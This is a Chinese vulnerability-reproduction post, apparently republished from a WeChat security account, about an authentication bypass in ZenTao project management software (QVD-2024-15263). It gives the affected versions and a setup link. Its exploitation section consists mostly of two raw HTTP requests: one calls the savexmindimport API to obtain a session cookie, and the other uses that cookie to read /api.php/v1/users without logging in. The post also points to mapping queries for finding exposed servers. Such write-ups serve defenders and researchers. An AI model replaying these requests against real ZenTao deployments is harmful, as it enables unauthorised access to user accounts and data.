禅道 项目管理软件 是国产的开源免费项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期管理及全面支持IPD管理流程。
开发语言:PHP开发厂商:https://www.zentao.net/
空间测绘
回复“20240427”获取空间测绘语句漏洞描述
禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。
影响版本
v16.x ≤ zentao < v18.12 (开源版)v6.x ≤ zentao < v8.12 (企业版)v3.x ≤ zentao < v4.12 (旗舰版)
环境搭建
官网下载源代码部署即可。
https://dl.zentao.net/zentao/18.11/ZenTaoPMS-18.11-php7.0.tar.xz漏洞利用
1.获取cookie。
GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1Host: xxx.xxx.xxxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9sec-ch-ua-platform: "Windows"sec-ch-ua: "Google Chrome";v="109", "Chromium";v="109", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: close
2.然后设置cookie发包,回显下图内容代表漏洞存在。
GET /api.php/v1/users HTTP/1.1Host: xxx.xxx.xxxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: zentaosid=dt3g72v4k8qmt0a5fqbqh9tp00x-requested-with: XMLHttpRequestConnection: close
一键利用
参考链接
https://mp.weixin.qq.com/s/qyqP6k6vaQRflnue95w61Ahttps://mp.weixin.qq.com/s/F6EorG4kuNLeD1-BSg_plQhttps://mp.weixin.qq.com/s/hi3vy3atKUGzlV9Mq8yKVg
原文始发于微信公众号(不够安全):[漏洞复现] 禅道身份认证绕过漏洞 QVD-2024-15263
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论